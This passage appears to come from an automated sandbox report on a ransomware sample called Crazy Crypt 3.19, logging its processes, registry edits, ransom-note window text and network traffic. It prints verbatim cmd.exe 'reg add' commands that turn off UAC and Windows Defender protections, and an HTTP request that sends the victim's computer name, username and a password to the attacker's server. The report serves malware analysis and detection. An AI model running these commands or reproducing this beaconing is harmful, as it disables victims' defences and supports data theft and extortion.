| Create | cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm /v EnableLUA /t REG_DWORD /d 0 /f | os_pid = 0x9d4, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINIMIZED |
|
1 | |
| Create | cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 00000001 /f | os_pid = 0x9dc, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINIMIZED |
|
1 | |
| Create | cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f | os_pid = 0x9e4, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINIMIZED |
|
1 | |
| Create | cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 00000001 /f | os_pid = 0x9ec, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINIMIZED |
|
1 | |
| Create | cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableBehaviorMonitoring /t REG_DWORD /d 00000001 /f | os_pid = 0xa04, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINIMIZED |
|
1 | |
| Create | cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableOnAccessProtection /t REG_DWORD /d 00000001 /f | os_pid = 0xa0c, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINIMIZED |
|
1 | |
| Create | cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableScanOnRealtimeEnable /t REG_DWORD /d 00000001 /f | os_pid = 0xa14, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINIMIZED |
|
1 |
Module (119)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\\wminet_utils.dll | base_address = 0x642ffff0000 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x77640000 |
|
1 | |
| Get Handle | c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe | base_address = 0x1190000 |
|
65 | |
| Get Address | c:\windows\system32\user32.dll | function = DefWindowProcW, address_out = 0x7788b0ac |
|
1 | |
| Get Address | Unknown module name | function = ResetSecurity, address_out = 0x642ffff20e0 |
|
1 | |
| Get Address | Unknown module name | function = SetSecurity, address_out = 0x642ffff21b0 |
|
1 | |
| Get Address | Unknown module name | function = BlessIWbemServices, address_out = 0x642ffff2290 |
|
1 | |
| Get Address | Unknown module name | function = BlessIWbemServicesObject, address_out = 0x642ffff23b0 |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyHandle, address_out = 0x642ffff24d0 |
|
1 | |
| Get Address | Unknown module name | function = WritePropertyValue, address_out = 0x642ffff2500 |
|
1 | |
| Get Address | Unknown module name | function = Clone, address_out = 0x642ffff2530 |
|
2 | |
| Get Address | Unknown module name | function = VerifyClientKey, address_out = 0x642ffff31f0 |
|
1 | |
| Get Address | Unknown module name | function = GetQualifierSet, address_out = 0x642ffff2a50 |
|
1 | |
| Get Address | Unknown module name | function = Get, address_out = 0x642ffff2700 |
|
1 | |
| Get Address | Unknown module name | function = Put, address_out = 0x642ffff26c0 |
|
1 | |
| Get Address | Unknown module name | function = Delete, address_out = 0x642ffff2750 |
|
1 | |
| Get Address | Unknown module name | function = GetNames, address_out = 0x642ffff2760 |
|
1 | |
| Get Address | Unknown module name | function = BeginEnumeration, address_out = 0x642ffff27b0 |
|
1 | |
| Get Address | Unknown module name | function = Next, address_out = 0x642ffff27c0 |
|
1 | |
| Get Address | Unknown module name | function = EndEnumeration, address_out = 0x642ffff2810 |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyQualifierSet, address_out = 0x642ffff2820 |
|
1 | |
| Get Address | Unknown module name | function = GetObjectText, address_out = 0x642ffff2840 |
|
1 | |
| Get Address | Unknown module name | function = SpawnDerivedClass, address_out = 0x642ffff2860 |
|
1 | |
| Get Address | Unknown module name | function = SpawnInstance, address_out = 0x642ffff2880 |
|
1 | |
| Get Address | Unknown module name | function = CompareTo, address_out = 0x642ffff28a0 |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyOrigin, address_out = 0x642ffff28c0 |
|
1 | |
| Get Address | Unknown module name | function = InheritsFrom, address_out = 0x642ffff28e0 |
|
1 | |
| Get Address | Unknown module name | function = GetMethod, address_out = 0x642ffff28f0 |
|
1 | |
| Get Address | Unknown module name | function = PutMethod, address_out = 0x642ffff2940 |
|
1 | |
| Get Address | Unknown module name | function = DeleteMethod, address_out = 0x642ffff2990 |
|
1 | |
| Get Address | Unknown module name | function = BeginMethodEnumeration, address_out = 0x642ffff29a0 |
|
1 | |
| Get Address | Unknown module name | function = NextMethod, address_out = 0x642ffff29b0 |
|
1 | |
| Get Address | Unknown module name | function = EndMethodEnumeration, address_out = 0x642ffff2a00 |
|
1 | |
| Get Address | Unknown module name | function = GetMethodQualifierSet, address_out = 0x642ffff2a10 |
|
1 | |
| Get Address | Unknown module name | function = GetMethodOrigin, address_out = 0x642ffff2a30 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Get, address_out = 0x642ffff2a60 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Put, address_out = 0x642ffff2ab0 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Delete, address_out = 0x642ffff2ae0 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_GetNames, address_out = 0x642ffff2af0 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_BeginEnumeration, address_out = 0x642ffff2b10 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Next, address_out = 0x642ffff2b20 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_EndEnumeration, address_out = 0x642ffff2b70 |
|
1 | |
| Get Address | Unknown module name | function = GetCurrentApartmentType, address_out = 0x642ffff2a50 |
|
1 | |
| Get Address | Unknown module name | function = GetDemultiplexedStub, address_out = 0x642ffff2060 |
|
1 | |
| Get Address | Unknown module name | function = CreateInstanceEnumWmi, address_out = 0x642ffff1760 |
|
1 | |
| Get Address | Unknown module name | function = CreateClassEnumWmi, address_out = 0x642ffff18c0 |
|
1 | |
| Get Address | Unknown module name | function = ExecQueryWmi, address_out = 0x642ffff1a20 |
|
1 | |
| Get Address | Unknown module name | function = ExecNotificationQueryWmi, address_out = 0x642ffff1b90 |
|
1 | |
| Get Address | Unknown module name | function = PutInstanceWmi, address_out = 0x642ffff1d00 |
|
1 | |
| Get Address | Unknown module name | function = PutClassWmi, address_out = 0x642ffff1e00 |
|
1 | |
| Get Address | Unknown module name | function = CloneEnumWbemClassObject, address_out = 0x642ffff1f00 |
|
1 | |
| Get Address | Unknown module name | function = ConnectServerWmi, address_out = 0x642ffff34c0 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
Window (59)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = WindowsForms10.Window.8.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | .NET-BroadcastEventWindow.2.0.0.0.378734a.0 | class_name = .NET-BroadcastEventWindow.2.0.0.0.378734a.0, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.Window.8.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Desativa_OffWin | class_name = WindowsForms10.BUTTON.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Desativa_Off | class_name = WindowsForms10.BUTTON.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | buykey@decryptionsales.online | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.EDIT.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | btnSerial | class_name = WindowsForms10.BUTTON.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Windows is working on updates wait till complete | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.Window.8.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Don't turn off your computer, this will take a while. | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.msctls_progress32.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.msctls_progress32.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.msctls_progress32.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.msctls_progress32.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.msctls_progress32.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.msctls_progress32.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.msctls_progress32.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.msctls_progress32.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.msctls_progress32.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.msctls_progress32.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.LISTBOX.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Crazy Crypt 3.19 | class_name = WindowsForms10.Window.8.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | www.decryptionsales.online | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Crazy Crypt official website: | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | price (they add their fee to our) or you can become a victim of a scam. | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Decryption of your files with the help of third parties may cause increased, | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Do not try to decrypt your data using third party software, | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Do not rename encrypted files. | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | it may cause permanent data loss. | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Before paying you can send us up to 1 file for free decryption. | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Free decryption as guarantee. | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | that will decrypt all your files. | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | The price depends on how fast you write to us. | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | ididididiid | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | After payment we will send you the decryption key | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | You have to pay for decryption in Bitcoins. | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | fdsfdsfsdfsdfsdfsdf | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Write this ID in the title of your message: | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | If you want to restore them, Write us to the e-mail: | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | All your files have been encrypted due to a security problem with your PC. | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | All your files have been encrypted! | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | TimerNativeWindow | class_name = WindowsForms10.Window.0.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = WindowsForms10.EDIT.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | Enter Decryption Key Here: | class_name = WindowsForms10.STATIC.app.0.378734a, wndproc_parameter = 0 |
|
1 | |
| Create | I made a payment, now give me my files back | class_name = WindowsForms10.BUTTON.app.0.378734a, wndproc_parameter = 0 |
|
1 |
Keyboard (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 |
System (39)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = XDUWTFONO |
|
2 | |
| Get Cursor | x_out = 1239, y_out = 316 |
|
4 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
9 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
16 |
Mutex (22)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = SINGLE_INSTANCE_APP_MUTEX |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
9 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = crazycrypt.store, address_out = 178.33.107.134 |
|
1 |
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 220 bytes |
| Total Data Received | 498 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 178.33.107.134:80 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x47c |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 178.33.107.134 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49158 |
| Data Sent | 220 bytes |
| Data Received | 498 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 178.33.107.134, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 158, size_out = 158 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 273 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 62, size_out = 62 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 225 |
|
1 |
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 220 bytes |
| Total Data Received | 498 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | crazycrypt.store |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | crazycrypt.store |
| Server Port | 80 |
| Data Sent | 158 |
| Data Received | 273 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = crazycrypt.store, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /requests/write.php?computer_name=XDUWTFONO&userName=5p5NrGJn0jS%20HALPmcxz&password=9C354B42 |
|
1 | |
| Send HTTP Request | headers = host: crazycrypt.store, connection: Keep-Alive, url = crazycrypt.store/requests/write.php?computer_name=XDUWTFONO&userName=5p5NrGJn0jS%20HALPmcxz&password=9C354B42 |
|
1 | |
| Read Response | size = 4096, size_out = 273 |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| Server Name | crazycrypt.store |
| Server Port | 80 |
| Data Sent | 62 |
| Data Received | 225 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = crazycrypt.store, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /requests/website.php |
|
1 | |
| Send HTTP Request | headers = host: crazycrypt.store, url = crazycrypt.store/requests/website.php |
|
1 | |
| Read Response | size = 4096, size_out = 225 |
|
1 |
Process #2: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9c4 |
| Parent PID | 0x98c (c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9C8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00687fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x01c1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c20000 | 0x01c20000 | 0x01f62fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f70000 | 0x0223efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ab10000 | 0x4ab68fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef8dc0000 | 0x7fef8dc7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xadc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4ab10000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77740000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77756d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x777523d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77748290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x777517e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 114161 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
